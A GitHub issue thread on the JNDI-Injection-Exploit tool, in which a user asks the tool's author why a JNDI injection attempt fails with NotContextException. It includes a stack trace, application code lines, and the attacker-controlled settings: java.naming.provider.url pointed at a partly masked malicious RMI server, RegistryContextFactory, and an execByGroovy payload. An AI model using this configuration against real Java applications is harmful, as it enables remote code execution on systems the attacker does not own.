JNDI-Injection-Exploit icon indicating copy to clipboard operation
JNDI-Injection-Exploit copied to clipboard
verified publisher icon welk1n

javax.naming.NotContextException: rmi://54.x.x.x:1099/ngiawf at RegistryContextFactory.URLToContext

Open yahanvesh opened this issue 5 years ago • 3 comments

I have tweaked the code to use the new Groovy payload given by orange last month. However in my usecase , i dont have a direct initialContext.lookup available. What i have is the path below- However right now its failing at line 104 in http://cr.openjdk.java.net/~mduigou/7072353/3/webrev/src/share/classes/com/sun/jndi/rmi/registry/RegistryContextFactory.java.html#104

As the object sent back from the EVIL RMI server is not an instance of Context? ANy suggestions if this can still be exploited?

javax.naming.NotContextException: rmi://54.x.x.x:1099/ngiawf
	at com.sun.jndi.rmi.registry.RegistryContextFactory.URLToContext(RegistryContextFactory.java:107) ~[?:1.8.0_222]
	at com.sun.jndi.rmi.registry.RegistryContextFactory.getInitialContext(RegistryContextFactory.java:69) ~[?:1.8.0_222]
	at javax.naming.spi.NamingManager.getInitialContext(NamingManager.java:684) ~[?:1.8.0_222]
	at javax.naming.InitialContext.getDefaultInitCtx(InitialContext.java:313) ~[?:1.8.0_222]
	at javax.naming.InitialContext.init(InitialContext.java:244) ~[?:1.8.0_222]
	at javax.naming.InitialContext.<init>(InitialContext.java:216) ~[?:1.8.0_222]
	at javax.naming.directory.InitialDirContext.<init>(InitialDirContext.java:101) ~[?:1.8.0_222]

yahanvesh avatar Apr 28 '20 19:04 yahanvesh

you are right, actually its an instance of RemoteReference/Remote. About how exploit "this", I dont follow you totally,what's the vul code and which part can you control?

welk1n avatar Apr 29 '20 02:04 welk1n

@welk1n Does the exploit happen only with the call InitialContext.lookup() ? Ill paste the code flow

yahanvesh avatar Apr 29 '20 07:04 yahanvesh

In my application, im able to override two params below- java.naming.provider.url which i set to rmi server generated by your code - rmi://54.x.x.x:1099/ngiawf java.naming.factory.initial=com.sun.jndi.rmi.registry.RegistryContextFactory

I have groovy and Apache bean Factory in the Classpath, so trying the execByGroovy payload Java version : 1.8.0.222

Here is the Code flow:- config contains the overriden params above. makeDirectoyEnv code basically sets these overridden values in Environment.

 1023  dirEnv = makeDirectoryEnv(this.getUrl(), config);
 1024  dirCtx = new InitialDirContext(dirEnv);
...
**then after some lines ***
1029 eventCtx = (EventContext) new InitialContext(dirEnv).lookup(config.getBaseDn());
  1. Im assuming the actual exploit happens at the lookup function ? Is it right assumption? 2)Secondly right now its failing at 1024 with the stack trace given above. So its not even able to reach lookup. So in which case is it not possible to exploit?

yahanvesh avatar Apr 29 '20 19:04 yahanvesh